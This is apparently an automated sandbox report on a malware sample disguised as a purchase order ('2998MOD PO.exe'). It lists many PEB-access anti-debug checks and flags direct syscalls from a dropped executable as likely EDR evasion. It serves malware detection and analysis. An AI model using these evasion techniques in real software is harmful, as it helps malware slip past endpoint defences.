                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BA6C7 mov ebx, dword ptr fs:[00000030h]4_2_019BA6C7
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BA6C7 mov eax, dword ptr fs:[00000030h]4_2_019BA6C7
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FE6F2 mov eax, dword ptr fs:[00000030h]4_2_019FE6F2
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FE6F2 mov eax, dword ptr fs:[00000030h]4_2_019FE6F2
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FE6F2 mov eax, dword ptr fs:[00000030h]4_2_019FE6F2
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FE6F2 mov eax, dword ptr fs:[00000030h]4_2_019FE6F2
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2619 mov eax, dword ptr fs:[00000030h]4_2_019C2619
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199260B mov eax, dword ptr fs:[00000030h]4_2_0199260B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199260B mov eax, dword ptr fs:[00000030h]4_2_0199260B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199260B mov eax, dword ptr fs:[00000030h]4_2_0199260B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199260B mov eax, dword ptr fs:[00000030h]4_2_0199260B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199260B mov eax, dword ptr fs:[00000030h]4_2_0199260B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199260B mov eax, dword ptr fs:[00000030h]4_2_0199260B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199260B mov eax, dword ptr fs:[00000030h]4_2_0199260B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FE609 mov eax, dword ptr fs:[00000030h]4_2_019FE609
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198262C mov eax, dword ptr fs:[00000030h]4_2_0198262C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B6620 mov eax, dword ptr fs:[00000030h]4_2_019B6620
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B8620 mov eax, dword ptr fs:[00000030h]4_2_019B8620
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199E627 mov eax, dword ptr fs:[00000030h]4_2_0199E627
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4866E mov eax, dword ptr fs:[00000030h]4_2_01A4866E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4866E mov eax, dword ptr fs:[00000030h]4_2_01A4866E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199C640 mov eax, dword ptr fs:[00000030h]4_2_0199C640
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B2674 mov eax, dword ptr fs:[00000030h]4_2_019B2674
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BA660 mov eax, dword ptr fs:[00000030h]4_2_019BA660
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BA660 mov eax, dword ptr fs:[00000030h]4_2_019BA660
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A089B3 mov esi, dword ptr fs:[00000030h]4_2_01A089B3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A089B3 mov eax, dword ptr fs:[00000030h]4_2_01A089B3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A089B3 mov eax, dword ptr fs:[00000030h]4_2_01A089B3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019809AD mov eax, dword ptr fs:[00000030h]4_2_019809AD
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019809AD mov eax, dword ptr fs:[00000030h]4_2_019809AD
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A0 mov eax, dword ptr fs:[00000030h]4_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0E9E0 mov eax, dword ptr fs:[00000030h]4_2_01A0E9E0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A9D0 mov eax, dword ptr fs:[00000030h]4_2_0198A9D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A9D0 mov eax, dword ptr fs:[00000030h]4_2_0198A9D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A9D0 mov eax, dword ptr fs:[00000030h]4_2_0198A9D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A9D0 mov eax, dword ptr fs:[00000030h]4_2_0198A9D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A9D0 mov eax, dword ptr fs:[00000030h]4_2_0198A9D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A9D0 mov eax, dword ptr fs:[00000030h]4_2_0198A9D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B49D0 mov eax, dword ptr fs:[00000030h]4_2_019B49D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A169C0 mov eax, dword ptr fs:[00000030h]4_2_01A169C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B29F9 mov eax, dword ptr fs:[00000030h]4_2_019B29F9
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B29F9 mov eax, dword ptr fs:[00000030h]4_2_019B29F9
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4A9D3 mov eax, dword ptr fs:[00000030h]4_2_01A4A9D3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0892A mov eax, dword ptr fs:[00000030h]4_2_01A0892A
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A1892B mov eax, dword ptr fs:[00000030h]4_2_01A1892B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01978918 mov eax, dword ptr fs:[00000030h]4_2_01978918
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01978918 mov eax, dword ptr fs:[00000030h]4_2_01978918
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FE908 mov eax, dword ptr fs:[00000030h]4_2_019FE908
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FE908 mov eax, dword ptr fs:[00000030h]4_2_019FE908
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0C912 mov eax, dword ptr fs:[00000030h]4_2_01A0C912
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A24978 mov eax, dword ptr fs:[00000030h]4_2_01A24978
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A24978 mov eax, dword ptr fs:[00000030h]4_2_01A24978
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0C97C mov eax, dword ptr fs:[00000030h]4_2_01A0C97C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A00946 mov eax, dword ptr fs:[00000030h]4_2_01A00946
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C096E mov eax, dword ptr fs:[00000030h]4_2_019C096E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C096E mov edx, dword ptr fs:[00000030h]4_2_019C096E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C096E mov eax, dword ptr fs:[00000030h]4_2_019C096E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A6962 mov eax, dword ptr fs:[00000030h]4_2_019A6962
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A6962 mov eax, dword ptr fs:[00000030h]4_2_019A6962
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A6962 mov eax, dword ptr fs:[00000030h]4_2_019A6962
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01980887 mov eax, dword ptr fs:[00000030h]4_2_01980887
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0C89D mov eax, dword ptr fs:[00000030h]4_2_01A0C89D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4A8E4 mov eax, dword ptr fs:[00000030h]4_2_01A4A8E4
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AE8C0 mov eax, dword ptr fs:[00000030h]4_2_019AE8C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BC8F9 mov eax, dword ptr fs:[00000030h]4_2_019BC8F9
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BC8F9 mov eax, dword ptr fs:[00000030h]4_2_019BC8F9
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A508C0 mov eax, dword ptr fs:[00000030h]4_2_01A508C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2483A mov eax, dword ptr fs:[00000030h]4_2_01A2483A
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2483A mov eax, dword ptr fs:[00000030h]4_2_01A2483A
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BA830 mov eax, dword ptr fs:[00000030h]4_2_019BA830
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A2835 mov eax, dword ptr fs:[00000030h]4_2_019A2835
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A2835 mov eax, dword ptr fs:[00000030h]4_2_019A2835
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A2835 mov eax, dword ptr fs:[00000030h]4_2_019A2835
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A2835 mov ecx, dword ptr fs:[00000030h]4_2_019A2835
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A2835 mov eax, dword ptr fs:[00000030h]4_2_019A2835
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A2835 mov eax, dword ptr fs:[00000030h]4_2_019A2835
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0C810 mov eax, dword ptr fs:[00000030h]4_2_01A0C810
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01984859 mov eax, dword ptr fs:[00000030h]4_2_01984859
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01984859 mov eax, dword ptr fs:[00000030h]4_2_01984859
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B0854 mov eax, dword ptr fs:[00000030h]4_2_019B0854
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A16870 mov eax, dword ptr fs:[00000030h]4_2_01A16870
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A16870 mov eax, dword ptr fs:[00000030h]4_2_01A16870
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0E872 mov eax, dword ptr fs:[00000030h]4_2_01A0E872
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0E872 mov eax, dword ptr fs:[00000030h]4_2_01A0E872
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01992840 mov ecx, dword ptr fs:[00000030h]4_2_01992840
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A34BB0 mov eax, dword ptr fs:[00000030h]4_2_01A34BB0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A34BB0 mov eax, dword ptr fs:[00000030h]4_2_01A34BB0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990BBE mov eax, dword ptr fs:[00000030h]4_2_01990BBE
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990BBE mov eax, dword ptr fs:[00000030h]4_2_01990BBE
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0CBF0 mov eax, dword ptr fs:[00000030h]4_2_01A0CBF0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A0BCB mov eax, dword ptr fs:[00000030h]4_2_019A0BCB
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A0BCB mov eax, dword ptr fs:[00000030h]4_2_019A0BCB
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A0BCB mov eax, dword ptr fs:[00000030h]4_2_019A0BCB
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01980BCD mov eax, dword ptr fs:[00000030h]4_2_01980BCD
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01980BCD mov eax, dword ptr fs:[00000030h]4_2_01980BCD
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01980BCD mov eax, dword ptr fs:[00000030h]4_2_01980BCD
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AEBFC mov eax, dword ptr fs:[00000030h]4_2_019AEBFC
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01988BF0 mov eax, dword ptr fs:[00000030h]4_2_01988BF0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01988BF0 mov eax, dword ptr fs:[00000030h]4_2_01988BF0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01988BF0 mov eax, dword ptr fs:[00000030h]4_2_01988BF0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2EBD0 mov eax, dword ptr fs:[00000030h]4_2_01A2EBD0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FEB1D mov eax, dword ptr fs:[00000030h]4_2_019FEB1D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FEB1D mov eax, dword ptr fs:[00000030h]4_2_019FEB1D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FEB1D mov eax, dword ptr fs:[00000030h]4_2_019FEB1D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FEB1D mov eax, dword ptr fs:[00000030h]4_2_019FEB1D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FEB1D mov eax, dword ptr fs:[00000030h]4_2_019FEB1D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FEB1D mov eax, dword ptr fs:[00000030h]4_2_019FEB1D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FEB1D mov eax, dword ptr fs:[00000030h]4_2_019FEB1D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FEB1D mov eax, dword ptr fs:[00000030h]4_2_019FEB1D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FEB1D mov eax, dword ptr fs:[00000030h]4_2_019FEB1D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A48B28 mov eax, dword ptr fs:[00000030h]4_2_01A48B28
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A48B28 mov eax, dword ptr fs:[00000030h]4_2_01A48B28
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AEB20 mov eax, dword ptr fs:[00000030h]4_2_019AEB20
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AEB20 mov eax, dword ptr fs:[00000030h]4_2_019AEB20
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A28B42 mov eax, dword ptr fs:[00000030h]4_2_01A28B42
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A16B40 mov eax, dword ptr fs:[00000030h]4_2_01A16B40
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A16B40 mov eax, dword ptr fs:[00000030h]4_2_01A16B40
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4AB40 mov eax, dword ptr fs:[00000030h]4_2_01A4AB40
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A34B4B mov eax, dword ptr fs:[00000030h]4_2_01A34B4B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A34B4B mov eax, dword ptr fs:[00000030h]4_2_01A34B4B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197CB7E mov eax, dword ptr fs:[00000030h]4_2_0197CB7E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2EB50 mov eax, dword ptr fs:[00000030h]4_2_01A2EB50
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B8A90 mov edx, dword ptr fs:[00000030h]4_2_019B8A90
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198EA80 mov eax, dword ptr fs:[00000030h]4_2_0198EA80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198EA80 mov eax, dword ptr fs:[00000030h]4_2_0198EA80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198EA80 mov eax, dword ptr fs:[00000030h]4_2_0198EA80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198EA80 mov eax, dword ptr fs:[00000030h]4_2_0198EA80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198EA80 mov eax, dword ptr fs:[00000030h]4_2_0198EA80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198EA80 mov eax, dword ptr fs:[00000030h]4_2_0198EA80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198EA80 mov eax, dword ptr fs:[00000030h]4_2_0198EA80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198EA80 mov eax, dword ptr fs:[00000030h]4_2_0198EA80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198EA80 mov eax, dword ptr fs:[00000030h]4_2_0198EA80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A54A80 mov eax, dword ptr fs:[00000030h]4_2_01A54A80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01988AA0 mov eax, dword ptr fs:[00000030h]4_2_01988AA0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01988AA0 mov eax, dword ptr fs:[00000030h]4_2_01988AA0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019D6AA4 mov eax, dword ptr fs:[00000030h]4_2_019D6AA4
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01980AD0 mov eax, dword ptr fs:[00000030h]4_2_01980AD0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B4AD0 mov eax, dword ptr fs:[00000030h]4_2_019B4AD0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B4AD0 mov eax, dword ptr fs:[00000030h]4_2_019B4AD0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019D6ACC mov eax, dword ptr fs:[00000030h]4_2_019D6ACC
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019D6ACC mov eax, dword ptr fs:[00000030h]4_2_019D6ACC
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019D6ACC mov eax, dword ptr fs:[00000030h]4_2_019D6ACC
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BAAEE mov eax, dword ptr fs:[00000030h]4_2_019BAAEE
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BAAEE mov eax, dword ptr fs:[00000030h]4_2_019BAAEE
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A4A35 mov eax, dword ptr fs:[00000030h]4_2_019A4A35
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A4A35 mov eax, dword ptr fs:[00000030h]4_2_019A4A35
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0CA11 mov eax, dword ptr fs:[00000030h]4_2_01A0CA11
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AEA2E mov eax, dword ptr fs:[00000030h]4_2_019AEA2E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BCA24 mov eax, dword ptr fs:[00000030h]4_2_019BCA24
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990A5B mov eax, dword ptr fs:[00000030h]4_2_01990A5B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990A5B mov eax, dword ptr fs:[00000030h]4_2_01990A5B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2EA60 mov eax, dword ptr fs:[00000030h]4_2_01A2EA60
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01986A50 mov eax, dword ptr fs:[00000030h]4_2_01986A50
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01986A50 mov eax, dword ptr fs:[00000030h]4_2_01986A50
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01986A50 mov eax, dword ptr fs:[00000030h]4_2_01986A50
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01986A50 mov eax, dword ptr fs:[00000030h]4_2_01986A50
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01986A50 mov eax, dword ptr fs:[00000030h]4_2_01986A50
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01986A50 mov eax, dword ptr fs:[00000030h]4_2_01986A50
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01986A50 mov eax, dword ptr fs:[00000030h]4_2_01986A50
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FCA72 mov eax, dword ptr fs:[00000030h]4_2_019FCA72
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FCA72 mov eax, dword ptr fs:[00000030h]4_2_019FCA72
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BCA6F mov eax, dword ptr fs:[00000030h]4_2_019BCA6F
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BCA6F mov eax, dword ptr fs:[00000030h]4_2_019BCA6F
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BCA6F mov eax, dword ptr fs:[00000030h]4_2_019BCA6F
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A54DAD mov eax, dword ptr fs:[00000030h]4_2_01A54DAD
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A48DAE mov eax, dword ptr fs:[00000030h]4_2_01A48DAE
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A48DAE mov eax, dword ptr fs:[00000030h]4_2_01A48DAE
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A8DBF mov eax, dword ptr fs:[00000030h]4_2_019A8DBF
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A8DBF mov eax, dword ptr fs:[00000030h]4_2_019A8DBF
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BCDB1 mov ecx, dword ptr fs:[00000030h]4_2_019BCDB1
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BCDB1 mov eax, dword ptr fs:[00000030h]4_2_019BCDB1
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BCDB1 mov eax, dword ptr fs:[00000030h]4_2_019BCDB1
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
